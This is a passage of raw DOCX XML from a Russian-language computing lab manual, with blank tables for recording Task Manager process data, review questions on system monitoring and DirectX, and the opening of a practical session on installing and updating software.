        <w:gridCol w:w="675"/>
        <w:gridCol w:w="3285"/>
        <w:gridCol w:w="3285"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>№ п.п.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:iCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Общая системная информация</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:iCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Количество</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Работающих приложений:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Активных процессов:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Активных потоков:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Дескрипторов:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 2. Результаты ознакомления с </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчером задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="675"/>
        <w:gridCol w:w="3285"/>
        <w:gridCol w:w="1642"/>
        <w:gridCol w:w="1643"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Частная системная информация</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>№ п.п.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Имя образа, .exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1642" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Вирт. память,</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Кб</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Значение приоритета</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Taskmgr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1642" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidTr="00672A00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dxdiag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1642" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="008634D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что называется мониторингом?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Чем отличается Мониторинг параметров и Мониторинг состояния?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какой программный модуль реализует Мониторинг параметров? Мониторинг состояния?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Что такое DirectX?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="00517F15" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="S23"/>
      <w:bookmarkStart w:id="142" w:name="_Toc22642670"/>
      <w:bookmarkStart w:id="143" w:name="_Toc26278735"/>
      <w:bookmarkStart w:id="144" w:name="_Toc507788246"/>
      <w:bookmarkStart w:id="145" w:name="_Toc507788521"/>
      <w:bookmarkEnd w:id="141"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 16</w:t>
      </w:r>
      <w:r w:rsidR="006B21A6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Инсталляция, настройка и обновление программного продукта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
      <w:bookmarkEnd w:id="143"/>
      <w:r w:rsidR="006B21A6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки, настройки и обновления программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">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6B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Отчет должен содержать скриншоты этапов выполнения работы и комментарии к ним. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Согласно инструкции из теоретической части выполнить задания по установке и настройке специализированных программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Проверить системные требования устанавливаемого программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Удостовериться, что на диске присутствует достаточно места для установки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
